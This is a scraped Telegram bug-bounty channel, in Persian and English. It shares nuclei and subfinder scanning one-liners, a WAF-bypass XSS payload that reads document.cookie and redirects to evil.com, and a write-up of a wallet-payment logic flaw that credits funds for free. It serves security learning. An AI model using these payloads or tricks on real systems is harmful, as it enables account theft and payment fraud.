Bugbounty Tips – Telegram
Bugbounty Tips
2.92K subscribers
84 photos
6 videos
13 files
92 links
research and sharing in cybersecurity
Download Telegram
یک چنل با محتوای بدرد بخور:
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍15🔥1
Bugbounty Tips pinned Deleted message
https://github.com/coffinxp/nuclei-templates



how to use in bug bounty programs:
subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all  | nuclei -t iis.yaml
subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
11👍3
Bugbounty Tips pinned Deleted message
Sucuri WAF Bypass:


payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97noscript&#x3A;&#97lert(document.cookie)>ClickMe


<a href="j&#97;vanoscript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>



For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#LINK
#WEB
👍3👀2
Email-verification-bypass.mkv
56.6 MB
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass

For more join to channel (:

https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
👍208🤝2🔥1👏1
یکم تا سوم ایونت باگ پارتی راورو اگه بودید میبینمتون❤️
👎14👍81
Media is too big
VIEW IN TELEGRAM
🐞 Party🥳🥳

به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:

https://news.1rj.ru/str/rootdr_research
15👎4
For more join to channel (:

https://news.1rj.ru/str/rootdr_research
👍4👎3🤔1
شارژ کیف پول بدون پرداخت!
آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت..
ساده، جالب و بدرد بخور

فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت میشد و در صورت موفق بودن میرفت برای callback به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:

{"method":"zarinpal","amount":"200000"}
🔥6👍1
Bugbounty Tips
شارژ کیف پول بدون پرداخت! آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت.. ساده، جالب و بدرد بخور فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت…
با خودم گفتم متد وقتی متد درگاه وجود داره ممکنه از متد wallet هم بابت پرداخت هزینه های سرویس سایت از ولت کاربر هم استفاده بشه
تیر تو تاریکی..
متد رو کردم ولت به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:


{"method":"wallet","amount":"20000000"}

در کمال تعجب ولت من شارژ شد!
جالب بود برام گفتم برای شما هم به اشتراک بزارم.
امیدوارم براتون مفید باشه❤️
👏243
🔥8🤔1
Bugbounty Tips
یکم تا سوم ایونت باگ پارتی راورو اگه بودید میبینمتون❤️
پیمان روز آخر اومد دوتا ایجکشن زد و رفت 😂😂😂🤑
نوش جونش

For more join to channel (:

https://news.1rj.ru/str/rootdr_research
👏7
For more join to channel (:

https://news.1rj.ru/str/rootdr_research
👏6👍1
این رو به هیچ وجه از دست ندید:

https://www.instagram.com/reel/DB4IlpHCnxW/?igsh=MXRmOHR0c3lldDBvcA==

آسیب پذیری Race Condition! برای تمام فصول، پارت دوم!

در این پارت به سناریو عملی این آسیب پذیری پرداختیم، نکاتش رو گفتیم و یکی از معروف ترین و بزرگ ترین لابراتوارهای اون رو حل کردیم، و سعی شد کامل این آسیب پذیری به زبان ساده پوشش داده بشه!

کامل این ویدئو رو در چنل یوتیوب PentesterLand قرارداده شد:
https://youtu.be/55ioAXYbli0
👍6